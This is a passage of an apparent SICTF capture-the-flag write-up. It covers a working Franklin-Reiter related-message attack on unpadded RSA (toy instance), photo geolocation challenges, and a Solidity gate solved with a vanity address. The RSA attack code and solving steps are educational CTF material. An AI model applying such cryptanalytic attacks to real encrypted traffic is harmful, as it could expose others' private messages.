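            p[shift + i] = (p[shift + i] - coef * c) % n
        trim(p)
    return p


def gcd_monic(p, q, n):
    while q:
        p, q = q, rem(p, q, n)
    inv = pow(p[-1], -1, n)
    return [c * inv % n for c in p]


def franklin_reiter(n, e, c1, c2, a, b):
    """Recover m from c1 = m^e and c2 = (a*m + b)^e under the same (n, e)."""
    g1 = add(power([0, 1], e, n), [c1], n, sign=-1)   # x^e - c1
    g2 = add(power([b, a], e, n), [c2], n, sign=-1)   # (a*x + b)^e - c2
    g = gcd_monic(g1, g2, n)
    if len(g) != 2:
        raise ValueError("gcd is not linear; the messages are not related as assumed")
    return (-g[0]) % n                                  # g(x) = x - m


# Constructed toy instance for this example: small known primes, e = 3, made-up message.
P, Q = 1000000007, 998244353
N = P * Q
E, A, B = 3, 233, 9527
M = 123456789
C1 = pow(M, E, N)
C2 = pow(A * M + B, E, N)


def demo():
    return franklin_reiter(N, E, C1, C2, A, B)


if __name__ == "__main__":
    print("recovered:", demo(), "expected:", M)
```

The lesson on the design side is the same as for the common-modulus case: two encryptions of messages that are linearly related, with no randomised padding, share the root m of two known polynomials, and a polynomial gcd finds it without the private key.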

Forensics

[Check-in] OSINT check-in

Baidu image search finds similar pictures; the location is 红城湖 (Hongcheng Lake)

SICTF{海南省_海口市_琼山区_红城湖公园}

树木的压迫 (Oppression of the Trees)

Crop out the part marked with the red line and run it through Baidu image search; it is 达州市体育中心 (Dazhou Sports Center)

SICTF{四川省_达州市_通川区_凤凰大道376号_达州市体育中心}

这才是签到 (This is the real check-in)

Google image search shows this is Venice, Italy

Then search Google Maps around 达涅利酒店 (Hotel Danieli) to find Gondola Danieli

Trying every visible place in the picture above one by one shows the destination is Chiesa di San Zaccaria (don't learn from this

flag:

SICTF{意大利_威尼斯_GondolaDanieli_ChiesadiSanZaccaria}

真的签到 (Really a check-in)

Crop out the Ferris wheel and run Baidu image search; it finds a Ferris wheel next to 大信新都汇 (Daxin Xindu Hui).

Then from this video it is clear that this is at 黄杨河 (Huangyang River)

flag

SICTF{广东省_珠海市_斗门区_大信新都汇}

blockchain

CheckinNewYear

Connect with nc; the usual options 1, 2, 4. Reference: [CTF] Blockchain: getting started with contract challenges, overview of challenge types, faucet comparison, basics of the Remix IDE, part 1 (NewStarCTF)

Source:

pragma solidity ^0.8.9;

contract HappyNewYear{
    string private NewYear;
    constructor(string memory _newyear ) {
        NewYear = _newyear;
    }
    function happyNewYear(string memory _newYear) public payable {

        require(uint160(msg.sender) |
            2**16 * 3**3 * 5 * 7 * 13 * 17 * 19 * 37 * 73 * 97 * 109 * 241 * 257 * 433 * 577 * 673 * 38737 * 487824887233 ==
            2**2 * 17 * 67 * 733 * 316139 * 18992431891 * 72887484710091183279372959
            ,"Not this Year");
        NewYear = _newYear;
    }

    function isSolved() public view returns (bool){
        require(keccak256(abi.encodePacked(NewYear)) == keccak256(abi.encodePacked("Happy")),"not HappyNewYear");
        return true;
    }

}

Calling happyNewYear to set NewYear to Happy is all that is needed, but before the assignment our address is checked: the first product is a mask covering bits 16 to 159, so OR-ing the address with it leaves only the low 16 bits of the address free, and the second product is that mask with 0x2024 in the low 16 bits. The address therefore has to end in 0x2024.
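Added example (not from the original writeup): Python that multiplies out the two factor lists from the require() above to show what the check really tests, plus a helper that evaluates the condition for any hex address. decode_check and passes_check are this example's own names, and the sample addresses are constructed.

```python
from functools import reduce
from operator import mul

# Factor lists copied verbatim from the contract's require().
MASK_FACTORS = [2**16, 3**3, 5, 7, 13, 17, 19, 37, 73, 97, 109, 241,
                257, 433, 577, 673, 38737, 487824887233]
TARGET_FACTORS = [2**2, 17, 67, 733, 316139, 18992431891,
                  72887484710091183279372959]


def product(xs):
    return reduce(mul, xs, 1)


def decode_check():
    """Expand the obfuscated constants and describe the condition in plain bit terms."""
    mask, target = product(MASK_FACTORS), product(TARGET_FACTORS)
    return {
        "mask": mask,
        "target": target,
        # 2^160 - 2^16: every address bit from 16 up to 159 is set by the OR
        "mask_is_bits_16_to_159": mask == (1 << 160) - (1 << 16),
        # the only bits the sender can still influence are the low 16
        "required_suffix": target & 0xFFFF,
    }


def passes_check(address_hex: str) -> bool:
    """Evaluate the contract's  uint160(addr) | MASK == TARGET  for a hex address."""
    addr = int(address_hex, 16) & ((1 << 160) - 1)   # uint160 truncation
    mask, target = product(MASK_FACTORS), product(TARGET_FACTORS)
    return (addr | mask) == target


if __name__ == "__main__":
    info = decode_check()
    print("mask covers bits 16..159:", info["mask_is_bits_16_to_159"])
    print("required address suffix: 0x%04x" % info["required_suffix"])
    # constructed sample addresses
    print(passes_check("0x" + "ab" * 18 + "2024"), passes_check("0x" + "ab" * 18 + "2023"))
```

Reading a gate like this by expanding it is cheaper than guessing: once the mask is recognised as 2^160 - 2^16, the whole condition collapses to "low 16 bits of msg.sender equal 0x2024".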

So create a vanity address with the suffix 0x2024.

Reference: NewStarCTF Week3 Blockchain

This website can generate Ethereum addresses with a specified prefix or suffix.

Specify the last four hex digits as 2024; after a while a matching address is produced, and it can be imported into MetaMask via its private key

Then switch the account in Remix to the new one, run chooseone first, and once that transaction completes call happyNewYear with Happy.

Fill the attack address into option 1 and the value to pass, Happy, into option 2, then call isSolved.

Option 3 over nc shows the flag.